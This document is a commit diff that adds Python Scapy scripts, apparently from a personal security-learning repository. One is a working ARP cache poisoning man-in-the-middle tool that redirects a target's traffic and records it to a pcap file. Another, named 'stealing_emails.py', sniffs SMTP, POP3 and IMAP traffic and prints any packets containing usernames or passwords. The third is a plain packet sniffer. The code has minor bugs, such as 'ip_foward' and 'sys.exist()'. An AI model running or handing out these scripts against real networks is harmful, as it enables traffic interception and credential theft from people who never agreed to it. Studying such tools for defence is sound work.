some scapy scripts

Network_and_802.11/scapy/arp_cache_poisoning.py

@@ -0,0 +1,128 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+'''
+To run you need to tell the local host machine to forward packets along
+both the gateway and the target IP address:
+$ echo 1 /proc/sys/net/ipv4/ip_foward
+'''
+
+from scapy.all import *
+from scapy.error import Scapy_Exception
+import os
+import sys
+import threading
+import signal
+
+# sends out the appropriate ARP packets to the network broadcast address to reset
+# the ARP caches of the gateway and target machines
+def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
+    print '[*] Restoring targets...'
+    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', \
+        hwsrc=gateway_mac), count=5)
+    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", \
+        hwsrc=target_mac), count=5)
+
+    # signals the main thread to exit
+    os.kill(os.getpid(), signal.SIGINT)
+
+# use the srp (send and receive packet) function to emit an ARP request to the
+# specified IP address in order to resolve the MAC address
+def get_mac(ip_address):
+    response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
+        timeout=2, retry=10)
+
+    # return the MAC address from a response
+    for s, r in response:
+        return r[Ether].src
+
+    return None
+
+# builds up ARP requests for poisoning both the target IP and the gateway
+# we keep emitting the ARP requests in a loop to make sure that the ARP entries
+# remain poisoned during the attack
+def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
+    poison_target = ARP()
+    poison_target.op = 2
+    poison_target.psrc = gateway_ip
+    poison_target.pdst = target_ip
+    poison_target.hwdst = target_mac
+
+    poison_gateway = ARP()
+    poison_gateway.op = 2
+    poison_gateway.psrc = target_ip
+    poison_gateway.pdst = gateway_ip
+    poison_gateway.hwdst = gateway_mac
+
+    print '[*] Beginning the ARP poison. [CTRL-C to stop]'
+
+    while 1:
+        try:
+            send(poison_target)
+            send(poison_gateway)
+
+            time.sleep(2)
+
+        except KeyboardInterrupt:
+            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
+
+        print '[*] ARP poison attack finished.'
+        return
+
+INTERFACE       =   'wlp1s0'
+TARGET_IP       =   '192.168.1.107'
+GATEWAY_IP      =   '192.168.1.1'
+PACKET_COUNT    =   1000
+
+# set our interface
+conf.iface = INTERFACE
+
+# turn off output
+conf.verb = 0
+
+print "[*] Setting up %s" % INTERFACE
+
+# resolve the gateway
+GATEWAY_MAC = get_mac(GATEWAY_IP)
+
+if GATEWAY_MAC is None:
+    print "[-] Failed to get gateway MAC. Exiting."
+    sys.exit(0)
+else:
+    print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)
+
+# resolve the target MAC address
+TARGET_MAC = get_mac(TARGET_IP)
+if TARGET_MAC is None:
+    print "[-] Failed to get target MAC. Exiting."
+    sys.exit(0)
+else:
+    print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)
+
+# start poison thread to perform the ARP poisoning attack
+poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
+    TARGET_IP, TARGET_MAC))
+poison_thread.start()
+
+try:
+    print '[*] Starting sniffer for %d packets' %PACKET_COUNT
+    bpf_filter = 'IP host ' + TARGET_IP
+    # start the sniffer that will capture a preset amount of packets using
+    # a BPF filter to only capture traffic for our target IP ADDRESS
+    packets = sniff(count=PACKET_COUNT, filter=bpf_filter, iface=INTERFACE)
+
+    # write out the captured packets
+    wrpcap('arper.pcap', packets)
+
+    # restore the network
+    restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
+
+except Scapy_Exception as msg:
+    print msg, "Hi there!!"
+
+except KeyboardInterrupt:
+    # restore the network
+    restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
+    sys.exist()
+

Network_and_802.11/scapy/simple_sniffer.py

@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+''' A simple sniffer '''
+
+'''
+DOCUMENTATION:
+# sniffer that dissects and dumps the packets out
+# filter allows to specify a BPF, wireshark style to packets,
+# for example, to sniff all HTTP packets you use a BPF filter of tcp
+# and port 80
+# iface parameter tells the sniffer which network interface to sniff on
+# prn parameter specifies a callback function to every packet that matches the filter
+# and it will receive packet as its single parameter
+# count specifies how many packets you want to sniff (blank: infinite)
+sniff(filter'', iface='any', prn=function, count=N)
+'''
+
+
+from scapy.all import *
+
+# our packet callback
+def packet_callback(packet):
+    print packet.show()
+
+# fire up the sniffer on all interfaces, with no filtering
+sniff(prn=packet_callback, count=1)
+
+

Network_and_802.11/scapy/stealing_emails.py

@@ -5,26 +5,22 @@
 ''' A simple sniffer to capture SMTP, POP3, IMAP credentials'''
 
 
-''''
-DOCUMENTATION:
-# sniffer that dissects and dumps the packets out
-# filter allows to specify a BPF, wireshark style to packets,
-# for example, to sniff all HTTP packets you use a BPF filter of tcp
-# and port 80
-# iface parameter tells the sniffer which network interface to sniff on
-# prn parameter specifies a callback function to every packet that matches the filter
-# and it will receive packet as its single parameter
-# count specifies how many packets you want to sniff (blank: infinite)
-sniff(filter'', iface='any', prn=function, count=N)
-'''
-
-
 from scapy.all import *
 
 # our packet callback
 def packet_callback(packet):
-    print packet.show()
+    # check to make sure it has a data payload
+    if packet[TCP].payload:
+        mail_packet = str(packet[TCP].payload)
+        if 'user' in mail_packet.lower() or 'pass' in mail_packet.lower():
+            print '[*] Server: %s' % packet[IP].dst
+            print '[*] %s' %packet[TCP].payload
+
+
 
-# fire up the sniffer
+# fire up the sniffer on all interfaces, with no filtering
+# store 0 ensures that the packets are not kept in memory (good when
+# leaving a long term sniffer running, so wont consume too much ram)
+sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)